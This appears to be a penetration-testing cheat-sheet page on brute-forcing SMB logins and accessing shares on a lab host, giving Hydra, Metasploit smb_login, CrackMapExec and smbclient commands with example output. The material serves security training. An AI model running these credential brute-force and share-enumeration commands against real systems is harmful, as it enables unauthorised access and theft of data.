SMB [139,445]

Brute-Forcing SMB Logins

Hydra Method

hydra -L user.list -P password.list smb://10.129.42.197

✅ Example Output:

[445][smb] host: 10.129.42.197   login: user   password: password

⚠️ Warning: SMB does not support many parallel connections — limit to 1 task!

🛑 Possible Error:

[ERROR] invalid reply from target smb://10.129.42.197:445/

Usually caused by incompatibility with SMBv3
✅ Solution: Use Metasploit instead

Brute-Force SMB with Metasploit

Launch Metasploit:

msfconsole -q

use auxiliary/scanner/smb/smb_login
set user_file user.list
set pass_file password.list
set rhosts 10.129.42.197
run

🟢 Example Output:

[+] 10.129.42.197:445 - Success: '.\user:password'

Enumerating SMB Shares with CrackMapExec

crackmapexec smb 10.129.42.197 -u "user" -p "password" --shares

📝 Output Example:

Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
SHARENAME       READ,WRITE      
IPC$            READ            Remote IPC

Accessing SMB Shares via smbclient

smbclient -U user \\\\10.129.42.197\\SHARENAME

🔐 Enter password:

Enter WORKGROUP\user's password:

🧾 Example Output:

smb: \> ls
  .                                  DR        0  Thu Jan  6 18:48:47 2022
  ..                                 DR        0  Thu Jan  6 18:48:47 2022
  desktop.ini                       AHS      282  Thu Jan  6 15:44:52 2022

PreviousRDP [3389]NextQuestions

Last updated 3 months ago

Brute-Forcing SMB Logins

Hydra Method

🛑 Possible Error:

Brute-Force SMB with Metasploit

Launch Metasploit:

Configure the SMB Login Scanner:

Enumerating SMB Shares with CrackMapExec

Accessing SMB Shares via smbclient

🧾 Example Output: